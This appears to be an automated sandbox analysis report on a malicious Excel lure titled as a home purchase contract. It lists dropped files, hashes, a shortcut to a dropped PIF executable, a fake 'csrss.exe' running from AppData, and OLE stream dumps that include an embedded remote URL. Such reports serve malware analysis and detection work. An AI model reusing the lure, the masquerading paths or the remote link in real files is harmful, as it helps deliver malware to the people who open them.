File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu May 23 19:21:27 2024, Security: 1
Category:	dropped
Size (bytes):	357376
Entropy (8bit):	7.9574463262525565
Encrypted:	false
SSDEEP:	6144:c4DA2v4UcLe0JOqPQZR8MDdATCR3tSelY5vsLx3HRoTvrnfJRnPh12TBpShVug:c4NwUP/qPQZR8MxAm/SeCsN3xirPPKH
MD5:	42E9B6532A4FCF588D5B003158586155
SHA1:	3A73E403D6FE67D4249DE2B82917D8551E1CFD4A
SHA-256:	A503730E0EC1D5B495A5D9DFEDECC69A23F3A25AF02078DADE9D13A0819404CB
SHA-512:	393E66CC015F85AE73A6D12A6B25EF953943B915EA1D563668C4DF4D6BD4179E182B57005914B2B05F15A601091DF54EDE353A8917B4833A8ABA0B0DFE96355E
Malicious:	false
Preview:	......................>...............................................................u.......w........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Users\user\Desktop\0B430000:Zone.Identifier

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\Desktop\Home Purchase Contract and Property Details.xls (copy)

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu May 23 19:21:27 2024, Security: 1
Category:	dropped
Size (bytes):	357376
Entropy (8bit):	7.9574463262525565
Encrypted:	false
SSDEEP:	6144:c4DA2v4UcLe0JOqPQZR8MDdATCR3tSelY5vsLx3HRoTvrnfJRnPh12TBpShVug:c4NwUP/qPQZR8MxAm/SeCsN3xirPPKH
MD5:	42E9B6532A4FCF588D5B003158586155
SHA1:	3A73E403D6FE67D4249DE2B82917D8551E1CFD4A
SHA-256:	A503730E0EC1D5B495A5D9DFEDECC69A23F3A25AF02078DADE9D13A0819404CB
SHA-512:	393E66CC015F85AE73A6D12A6B25EF953943B915EA1D563668C4DF4D6BD4179E182B57005914B2B05F15A601091DF54EDE353A8917B4833A8ABA0B0DFE96355E
Malicious:	false
Preview:	......................>...............................................................u.......w........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Users\Public\Efftwcmk.url

Download File

Process:	C:\Users\user\AppData\Roaming\csrss.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Efftwcmk.PIF">), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	100
Entropy (8bit):	5.085951690356517
Encrypted:	false
SSDEEP:	3:HRAbABGQYmTWAX+rSF55i0XMgR1m7ovsb73cPk:HRYFVmTWDyzVR1m7yE74k
MD5:	3662EA53670602AFB4A434630AC412C2
SHA1:	B2E05C9F902EE48758AB9BF84949F87B126D43CA
SHA-256:	F70BE95C0F9440786C3D39632FC5972D36416ED2ABA3C7609F05E1715DE2AD10
SHA-512:	CB5816819FEFE1345B1C6557A3F8B08F61DA561A8D43DFDF74B7174B4D769860D68BF92F9CB5C9A85CCDB73A88B870440CF719C9F3B67D19E1BB53581948876C
Malicious:	true
Preview:	[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Efftwcmk.PIF"..IconIndex=33..HotKey=57..

C:\Users\Public\Libraries\Efftwcmk

Download File

Process:	C:\Users\user\AppData\Roaming\csrss.exe
File Type:	data
Category:	dropped
Size (bytes):	838431
Entropy (8bit):	7.204072438029786
Encrypted:	false
SSDEEP:	12288:KmFqq8TrOYDZ0RL/5HIpZKwDcu+ALjUwHxNnrpEGOFz9cWVAfGWYHW8:K1q83OYDSRbapwwj+6jTIFBe+Z
MD5:	3560042612EE429B1885C3BB21FEF9E0
SHA1:	DD3017011BE338C523D64CAA83720AD31D071DC0
SHA-256:	0B1DF2838ABCD03DAC0C056A5A2C661F6E3C9F23ADD7CD2BD75F468BF48B3E38
SHA-512:	4F234E906A20FE2E817F8657D2698B8AF88E5A0E0C4635FBF6F197640F77B250A46AA27FF1697EE65992C99ED9E80AA26BCF386132B08C35B0EAB69771CD4C8A
Malicious:	true
Preview:	...Y#..K.........!......%$.&$...!$.! #.$....'#......#.....Y#..KP..!$...#.....Y#..Kt]q{tmn^qce].-.U......v..J.'.#..LSttj.h Nzs...y[%...:.WG.../p.I.v.J...*0...l`w"I....:..tZ....G.......x...-~.fm.$P7.x....m..c...s..D]...1Y....O4X.!.....} .e.V..9.'.!.G..n..).US...1U...k$t....G.Pf^.ygJ.&.6.L..S......~....\........PMrqa.{\|.zv2.%.C.c.9bZz..$.4%!G..,...1...,.....".9..R/.(.;_...X9O'..+..6..4X....W^uW.....EULO...L.EX.rW.".H.I...bo.h...v.f..b..-.&x...../S..~..^....I.[iCS...I.'.D.Ix...'%:V..KV."{_.7z...F}!.,......]f`.iO...\T.._1SPs=app$]S.3...m0V^Dqc\,a.^DeX..gg.'..S..`...x-[=..s.....rx..Sx.n....]v.z...$.<..ro.V.'.C.._...=U.Y..\|'%Ky.p.s./.L.k..-.a....c.9O..~!.I{{. .V..O.:.u1...0../......G.1....H.$.8..._K..%.D.my.G.k.....~krw../..cJiG..Kz..d.vucS..'JL..#PJR.Sz..^.....^Wx.]....:.9.)p....;`E.$.9N....Fa...QSZ._.suus...._.n._n...)...wLfZ..&..1Sb....o..4{{.a.q~..L.pyt.i.R....c]v.14.lkU.'.4...zc\Fdh.qw.japp.lwap,.bU..mn^....by.~".H...qwb.b...._wn{2l\..)..wapH2?...8..qc]E`w...`]f.7~.E

C:\Users\Public\Libraries\Efftwcmk.PIF

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1388544
Entropy (8bit):	5.5299258127514435
Encrypted:	false
SSDEEP:	24576:AP+g7Wy3xfMZKdcKtTjbJ4HEEEEEEEEEEEEEEEEEEEETKKKKKKKKKKKKKKKKKKK7:A/iy3g6TjbsEEEEEEEEEEEEEEEEEEEE+
MD5:	913C99449A29C2640D36B0D5FDF69289
SHA1:	858971F52AB45DC8BE5F2C43DA9B0C25BA398435
SHA-256:	39475882127FD9789D9C23444153A4A4841F3FFBB34FFABB0C540E6E9D76D034
SHA-512:	B35A9A28D01A948455DA4D078D9F9D1AACB5E9FFF5C8359B4278400E29296C75FF96554AE6CC8CD4F53D1DB8525D43927C87B793E3FB2E72549D944FD62A6D96
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................X......(.............@..............................................@...........................@..@%...............................k...................................................F...............................text............................... ..`.itext..p<.......>.................. ..`.data...P...........................@....bss.....6...............................idata..@%...@...&..................@....tls....4....p...........................rdata..............................@..@.reloc...k.......l..................@..B.rsrc................t..............@..@.....................0..............@..@................................................................................................

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu May 23 08:00:55 2024, Security: 1
Entropy (8bit):	7.860131766399966
TrID:	Microsoft Excel sheet (30009/1) 47.99% Microsoft Excel sheet (alternate) (24509/1) 39.20% Generic OLE2 / Multistream Compound File (8008/1) 12.81%
File name:	Home Purchase Contract and Property Details.xls
File size:	251'392 bytes
MD5:	d9d5c1fa0851c35ace66d98089584cbe
SHA1:	9fe664c1645be3bb5bd9b3f1292993f247600155
SHA256:	777fe31b0202e8e5cf13a9d1d9dea155bfd6e569392714d1e8f61d20048e70ba
SHA512:	21a1ae0f92dc7d63a1a29494358bdcd7bd38fe633bb41e29ab356d10e528ee07bcd19c53f8593ca1bd4b4caf2b1f98b233c080b00d5be07d5660e2154043c1c7
SSDEEP:	6144:me4UcLe0JOqPQZR8MDdATCR3tSFHjTHxzF4ani/LaqBC:sUP/qPQZR8MxAm/StjDxzuai+e
TLSH:	1B34F1317E78D043DA60807878CE89D3AF26FD91AF41714F3620739EAA33594DD12A9E
File Content Preview:	........................>...................................+...........................n......................................................................................................................................................................

File Icon


Icon Hash:	276ea3a6a6b7bfbf

Static OLE Info

General

Document Type:	OLE
Number of OLE Files:	1

OLE File "Home Purchase Contract and Property Details.xls"

Indicators

Has Summary Info:
Application Name:	Microsoft Excel
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Summary

Code Page:	1252
Author:
Last Saved By:
Create Time:	2006-09-16 00:00:00
Last Saved Time:	2024-05-23 07:00:55
Creating Application:	Microsoft Excel
Security:	1

Document Summary

Document Code Page:	1252
Thumbnail Scaling Desired:	False
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	786432

Streams with VBA

VBA File Name: Sheet1.cls, Stream Size: 977

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet1
VBA File Name:	Sheet1.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 14 b9 14 db 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: Sheet2.cls, Stream Size: 977

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet2
VBA File Name:	Sheet2.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 14 b9 f2 38 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: Sheet3.cls, Stream Size: 977

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet3
VBA File Name:	Sheet3.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 14 b9 94 be 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: ThisWorkbook.cls, Stream Size: 985

General
Stream Path:	_VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA File Name:	ThisWorkbook.cls
Stream Size:	985
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . U . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . -
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 14 b9 1d 55 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.25248375192737
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244

General
Stream Path:	\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	244
Entropy:	2.889430592781307
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200

General
Stream Path:	\x5SummaryInformation
CLSID:
File Type:	data
Stream Size:	200
Entropy:	3.3020681057018666
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . \| . # . @ . . . - . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00

Stream Path: MBD00099100/\x1CompObj, File Type: data, Stream Size: 99

General
Stream Path:	MBD00099100/\x1CompObj
CLSID:
File Type:	data
Stream Size:	99
Entropy:	3.631242196770981
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD00099100/Package, File Type: Microsoft Excel 2007+, Stream Size: 150104

General
Stream Path:	MBD00099100/Package
CLSID:
File Type:	Microsoft Excel 2007+
Stream Size:	150104
Entropy:	7.951044443183293
Base64 Encoded:	True
Data ASCII:	P K . . . . . . . . . . ! . - N . . . C . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	50 4b 03 04 14 00 06 00 08 00 00 00 21 00 2d ca 4e f7 b1 01 00 00 43 06 00 00 13 00 cb 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 c7 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD00099101/\x1Ole, File Type: data, Stream Size: 862

General
Stream Path:	MBD00099101/\x1Ole
CLSID:
File Type:	data
Stream Size:	862
Entropy:	5.488004408870525
Base64 Encoded:	False
Data ASCII:	. . . . ' $ . l - . r . . . . . . . . . . . . . . . . y . . . K . . . . . h . t . t . p . : . / . / . q . r . - . i . n . . . c . o . m . / . N . A . v . S . G . z . Z . . . { O . j 3 . ) R X k . u > S I % 5 . x B I . . 0 Q k o h . ? o B d G a . ] . d . n { C w Q / . l z I a w Q O . W j . k . ~ F . G 4 \| . . e K . < . . : ~ c . D ! W 6 . % L ( . 3 . . . . . Y + U . p m T \| Z + M z . H ' . Y v C T . \| . , k D f X . w y : . . . . . . . . . . . . . . . . . . . p . 0 . P . z . M . h . W . 6 . Y . X . p . 3
Data Raw:	01 00 00 02 27 24 7f 6c 2d da 8a 72 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 0c 01 00 00 68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 71 00 72 00 2d 00 69 00 6e 00 2e 00 63 00 6f 00 6d 00 2f 00 4e 00 41 00 76 00 53 00 47 00 7a 00 5a 00 00 00 7b 4f 9e 0d c0 6a 33 f8 11 29 52 d0 58 f3 a0 6b 00 de e7 75 3e f8 53 ad 49 84 b2 25 9a 35

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 84851

General
Stream Path:	Workbook
CLSID:
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	84851
Entropy:	7.990591704325821
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . / . 6 . . . . . . . ( T ] : o C . w \| . W \| 4 . 1 4 ; . 2 p . ^ . : \| . n . . . . . . . # . . . \\ . p . o \\ F / { . c " _ j 1 . . . + * + . e \| 9 K . g . s Z ( . a $ - " . e . r . . 9 + . Q b . W t . 4 s w k q > B . . . A a . . . . . . . = . . . 0 B . . . . ] V 9 = + B . h D . . . = . . . . D o . . . . . . . . . E . . . P . . . ( . = . . . C ( _ . . v . Y S @ . . . 2 . . . " . . . . . . . . D o . . . . . . . S 1 . . . K m . . t ' . . 8 . r K . ' ? - . . R = 1 . . . z S
Data Raw:	09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 93 a5 9d bf 28 9c 54 5d a2 e1 3a 6f 43 14 fa 94 77 8c 7c 91 1c a3 90 b7 57 7c 34 02 31 e1 b3 34 3b 03 32 dc 70 10 f1 fd 5e 14 3a 7c 1e ea eb 6e e1 00 02 00 b0 04 c1 00 02 00 23 e7 e2 00 00 00 5c 00 70 00 df 6f 5c fc dd fb e5 dd 46 82 e7 2f b9 7b 1f a6 63 90 22 5f bc ff 6a 31 bd 15 09 fb b8 da

Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 517

General
Stream Path:	_VBA_PROJECT_CUR/PROJECT
CLSID:
File Type:	ASCII text, with CRLF line terminators
Stream Size:	517
Entropy:	5.234625546953192
Base64 Encoded:	True
Data ASCII:	I D = " { 9 B F 6 6 5 7 0 - F 4 F 3 - 4 6 6 8 - B 3 F E - E 7 A 8 F F E 9 D F 3 3 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 3 1 3 3 1 E 6 6 2 2 6 6 2 2 6 6 2
Data Raw:	49 44 3d 22 7b 39 42 46 36 36 35 37 30 2d 46 34 46 33 2d 34 36 36 38 2d 42 33 46 45 2d 45 37 41 38 46 46 45 39 44 46 33 33 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30

Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104

General
Stream Path:	_VBA_PROJECT_CUR/PROJECTwm
CLSID:
File Type:	data
Stream Size:	104
Entropy:	3.0488640812019017
Base64 Encoded:	False
Data ASCII:	T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
Data Raw:	54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2644

General
Stream Path:	_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
CLSID:
File Type:	data
Stream Size:	2644
Entropy:	3.9957371995480346
Base64 Encoded:	False
Data ASCII:	a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
Data Raw:	cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00

Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 553

General
Stream Path:	_VBA_PROJECT_CUR/VBA/dir
CLSID:
File Type:	data
Stream Size:	553
Entropy:	6.373714170133797
Base64 Encoded:	True
